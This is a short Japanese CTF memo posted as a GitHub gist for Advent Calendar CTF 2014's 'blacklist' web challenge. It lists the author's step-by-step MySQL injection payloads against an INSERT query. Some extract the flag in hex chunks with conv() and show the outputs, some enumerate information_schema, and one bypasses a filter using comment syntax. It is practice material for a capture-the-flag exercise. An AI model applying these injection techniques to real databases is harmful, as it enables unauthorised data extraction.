Skip to content

Instantly share code, notes, and snippets.

@st98

st98/memo.txt Secret

Created December 11, 2014 23:37
Show Gist options
  • Save st98/75192b3bd372dc3101ae to your computer and use it in GitHub Desktop.
Save st98/75192b3bd372dc3101ae to your computer and use it in GitHub Desktop.
Advent Calendar CTF 2014 10 日目 blacklist (web)
試行錯誤する様子、MySQL の仕様がよく分かってなかった
---
A', '127.0.0.1');#
A' 'B', '127.0.0.1')#
A' (select flag from flag), '127.0.0.1')#
' + @@VERSION, '127.0.0.1')#
' + hex('AB'), '127.0.0.1')#
' + (select 1), '127.0.0.1')#
' + hex((select 16)), '127.0.0.1')#
' + length(hex((select * from flag))), '127.0.0.1')# => 66
' + hex((select * from flag)), '127.0.0.1')# => 41444354465
' + substring(hex((select * from flag)), 1, 8), '127.0.0.1')# => 41444354
' + conv('aaaaaaaa', 16, 10), '127.0.0.1')#
' + conv(hex((select * from flag)), 16, 10), '127.0.0.1')#
' + conv(substring(hex((select * from flag)), 1, 8), 16, 10), '127.0.0.1')# => 1094992724
' + conv(substring(hex((select * from flag)), 9, 8), 16, 10), '127.0.0.1')# => 1180656688
' + conv(substring(hex((select * from flag)), 17, 8), 16, 10), '127.0.0.1')# => 1598975828
' + conv(substring(hex((select * from flag)), 25, 8), 16, 10), '127.0.0.1')# => 1599435571
' + conv(substring(hex((select * from flag)), 33, 8), 16, 10), '127.0.0.1')# => 1598444899
' + conv(substring(hex((select * from flag)), 41, 8), 16, 10), '127.0.0.1')# => 1261522527
' + conv(substring(hex((select * from flag)), 49, 8), 16, 10), '127.0.0.1')# => 946615395
' + conv(substring(hex((select * from flag)), 57, 8), 16, 10), '127.0.0.1')# => 1800155507
' + conv(substring(hex((select * from flag)), 65, 8), 16, 10), '127.0.0.1')# => 84
A' (select group_concat(flag, '|') from flag), '127.0.0.1')#
A' (select group_concat(column_name, '|') from information_schema.columns), '127.0.0.1')#
the flag is ' (select column_name from information_schema.columns where table_name='flag'), '127.0.0.1')#
concat(select group_concat(column_name,'|') from information_schema.columns where table_name='flag')
//**/** => /**
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment